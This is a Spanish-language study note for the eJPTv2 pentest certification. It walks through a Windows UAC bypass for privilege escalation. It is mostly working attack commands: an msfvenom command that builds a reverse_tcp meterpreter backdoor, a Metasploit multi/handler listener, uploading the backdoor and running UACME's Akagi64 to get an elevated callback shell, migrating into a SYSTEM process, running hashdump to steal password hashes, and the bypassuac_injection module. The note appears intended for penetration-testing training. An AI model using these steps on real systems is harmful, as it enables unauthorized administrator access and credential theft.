⟁ HXA πŸ‡¬πŸ‡§ EN 
β”Œβ”€[ UAC ]────────────────────────────────────────────────────────────────────────────────────────────
β”‚ user: Alejandro Lopez Aguilar
β”” path: /apuntes/ejptv2/escalada-de-privilegios/windows/uac/
:: β–Έ Manual

Antes de ejecutar esto, si podemos migrar al proceso explorer es recomendable:

pgrep explorer : Esto nos da un numero
migrate <numero>

Este exploit solo se puede ejecutar si el usuario que disponemos de bajos privilegios, pertenece al 
grupo de administradores.

Clonamos el repo: git clone <https://github.com/hfiref0x/UACME> (/root/Desktop/tools/UACME/)

Creamos un backdoor con msfvenom

`msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > backdoor.exe`

Desde netcat/metasploit estamos en nuestro puerto de escucha (UsarΓ© metasploit para este ejemplo)

β”Œβ”€[ code ]──────────────────────────────────────────────────────────────────────────────────────────
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT <Puerto configurado en el msfvenom previamente>
run
└───────────────────────────────────────────────────────────────────────────────────────────────────
Para ver si el usuario tiene permisos de admin ponemos:

`net user` : Puede que devuelva admin como resultado

Ahora, nos vamos a nuestra cmd sin privilegios de windows y subimos el backdoor, si tenemos sesiΓ³n 
de meterpreter abierta simplemente:

Recomendable crear o usar el directorio Tmp

β”Œβ”€[ code ]──────────────────────────────────────────────────────────────────────────────────────────
cd C:\\
mkdir Temp
upload backdoor.exe
upload Akagi64.exe
shell
.\Akagi64.exe 23 <ruta del backdoor.exe> (C:\Users\admin\AppData\Local\Temp\rev.exe)
└───────────────────────────────────────────────────────────────────────────────────────────────────
Una vez ejecutado, nos vamos a la ventana donde tenemos en escucha el multi/handler o el netcat, y 
recibimos una consola con mΓ‘ximos privilegios

Listamos procesos:

`ps`

Y migramos a un proceso que ejecute NT AUTHORITY:

`migrate <PID>`

Para ver los hashes desde meterpreter (hay que salir de la shell) usamos:

meterpreter > hashdump

:: β–Έ Metasploit (Recomendado)

Usamos el mΓ³dulo: exploit/windows/local/bypassuac_injection

β”Œβ”€[ code ]──────────────────────────────────────────────────────────────────────────────────────────
use exploit/windows/local/bypassuac_injection
set payload windows/x64/meterpreter/reverse_tcp
set session <session>
run
└───────────────────────────────────────────────────────────────────────────────────────────────────

ret <volume_4>  <indice>